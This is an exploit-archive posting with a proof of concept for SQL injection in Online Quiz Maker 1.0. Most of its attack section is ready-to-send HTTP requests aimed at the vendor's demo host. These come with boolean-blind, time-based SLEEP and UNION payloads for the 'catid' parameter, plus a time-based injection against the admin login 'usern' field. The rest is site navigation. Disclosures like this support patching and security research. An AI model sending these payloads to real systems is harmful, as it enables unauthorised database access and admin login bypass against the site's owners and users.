Online Quiz Maker 1.0 SQL Injection

Online Quiz Maker 1.0 SQL Injection: Posted Sep 3, 2018; Authored by Ozkan Mustafa Akkus; Online Quiz Maker version 1.0 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 994c27b76508be01e2509ccad7981e82a26fdb521fc850bb58906f7e1f5828d3; Download | Favorite | View

Online Quiz Maker 1.0 SQL Injection

# Exploit Title: Online Quiz Maker 1.0 - 'catid' SQL Injection
# Dork: N/A
# Date: 2018-09-03
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://www.hscripts.com/scripts/php/quiz-maker.php
# Software Link:https://www.hscripts.com/scripts/php/downloads/quiz-maker.zip
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
 
# Description : An attacker can execute SQL commands through parameters
# that contain vulnerable.
# An authorized user can use the filtering feature and can fully authorize
# the database or other server informations. Also there are XSS
# vulnerabilities too.
 
# PoC : SQLi 1 :
# Request(POST):
 
POST /scripts/php/quiz-system/quiz-system.php HTTP/1.1
Host: www.hscripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.hscripts.com/scripts/php/quiz-system/quiz-system.php
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
uname=test&catid=1
 
# Parameter: catid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: 
 
uname=test&catid=1 AND 4815=4815
 
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
 
uname=test&catid=1 AND SLEEP(5)
 
# Type: UNION query
# Title: Generic UNION query (NULL) - 10 columns
# Payload: 
 
uname=test&catid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170626271,0x56476b436866655067774c6d786b6e434f59566c7541666363786855764c686b5949486e6a4d6b68,0x7178716271),NULL,NULL,NULL--bocR
 
# PoC : SQLi 2: Admin Login SQL Injection
# Request(POST):
 
POST /scripts/php/quiz-system/admin/add-category.php HTTP/1.1
Host: www.hscripts.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://www.hscripts.com/scripts/php/quiz-system/admin/add-category.php
Cookie: PHPSESSID=k001uia98prmln85spaid6pvq4
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
usern=testing&passw=password&type=auth
 
# Parameter: usern (POST)
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
# Payload: 
 
usern=testing' AND SLEEP(5) AND 'ZECL'='ZECL&passw=password&type=auth

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 64 files
indoushka 59 files
Debian 21 files
LiquidWorm 19 files
Google Security Research 8 files
Gentoo 7 files
malvuln 6 files
Seth Jenkins 4 files
Emiliano Febbi 4 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,147)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,676)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,132)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,946)
UNIX (9,472)
UnixWare (188)
Windows (6,784)
Other

Online Quiz Maker 1.0 SQL Injection

Online Quiz Maker 1.0 SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online Quiz Maker 1.0 SQL Injection

Share This

Online Quiz Maker 1.0 SQL Injection

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems